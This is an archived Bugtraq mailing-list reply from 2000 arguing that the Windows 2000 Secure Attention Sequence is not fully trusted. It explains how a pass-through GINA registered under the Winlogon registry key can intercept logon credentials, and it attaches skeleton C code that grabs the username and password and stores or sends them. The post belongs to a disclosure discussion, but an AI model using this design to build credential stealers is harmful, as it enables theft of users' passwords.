|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: Windows 2000 Run As... Feature
Subject: Re: Windows 2000 Run As... Feature
From: jdglaser (jdglaser
NTOBJECTIVES.COM)
Date: Mon Jan 24 2000 - 08:31:31 CST
- Next message: Steven Kastl: "Re: Windows 2000 Run As... Feature"
- Previous message: Darren Moffat - Solaris Sustaining Engineering: "Re: Solaris 7 and solaris 8 file permissions"
- Maybe in reply to: David Terrell: "Windows 2000 Run As... Feature"
- Next in thread: Camillo Särs: "Re: Windows 2000 Run As... Feature"
- Next in thread: Steven Kastl: "Re: Windows 2000 Run As... Feature"
- Maybe reply: jdglaser: "Re: Windows 2000 Run As... Feature"
- Reply: Camillo Särs: "Re: Windows 2000 Run As... Feature"
- Reply: David LeBlanc: "Re: Windows 2000 Run As... Feature"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
That's a good point.
I'd like to add that MS Secure Attention Sequence is not exactly so
trusted.
Nothing prevents another Gina from being put into play, nor prevents
process code injection - DLL API hooking.
One way to do this can be done by altering the reg key
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
to implement a Pass-Through Gina (one which grabs your password and then
calls through to the real Gina)
While SAS prevents the old-style pop and disappear logon screens, it does
nothing to prevent password interception by trojan dll injection.
Both of these compromise the trust of the current SAS implemetation.
In light of that, I'm not sure another password path matters.
Just my thoughts,
jdg
Attached is an example of GINA pass-through code - pop the below listed
code into a dll, write the dll name as the value to the above listed key
and SAS now has an untrusted element.
int WINAPI WlxLoggedOutSAS (PVOID pWlxContext, DWORD dwSasType,
PLUID pAuthenticationId, PSID pLogonSid,
PDWORD pdwOptions, PHANDLE phToken,
PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
PVOID *pProfile)
{
//call real gina api
iRet = GWlxLoggedOutSAS (pWlxContext, dwSasType, pAuthenticationId,
pLogonSid,
pdwOptions, phToken, pMprNotifyInfo,
pProfile);
pMprNotifyInfo->pszUserName, <-Grab this
pMprNotifyInfo->pszPassword, <-Grab this
<insert whatever>
hFile = CreateFile (); <-Store it, send it, mail it
WriteFile ();
CloseHandle (hFile);
return iRet;
}
-----Original Message-----
From: David Terrell [SMTP:dbtmeat.net]
Sent: Friday, January 21, 2000 3:49 PM
To: BUGTRAQSECURITYFOCUS.COM
Subject: Windows 2000 Run As... Feature
>this is the first time (I know of) that the system asks for your password
>through a mechanism other than the trusted path (ctrl-alt-del to
>login,
- Next message: Steven Kastl: "Re: Windows 2000 Run As... Feature"
- Previous message: Darren Moffat - Solaris Sustaining Engineering: "Re: Solaris 7 and solaris 8 file permissions"
- Maybe in reply to: David Terrell: "Windows 2000 Run As... Feature"
- Next in thread: Camillo Särs: "Re: Windows 2000 Run As... Feature"
- Next in thread: Steven Kastl: "Re: Windows 2000 Run As... Feature"
- Maybe reply: jdglaser: "Re: Windows 2000 Run As... Feature"
- Reply: Camillo Särs: "Re: Windows 2000 Run As... Feature"
- Reply: David LeBlanc: "Re: Windows 2000 Run As... Feature"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b27 : Mon Jan 24 2000 - 21:46:19 CST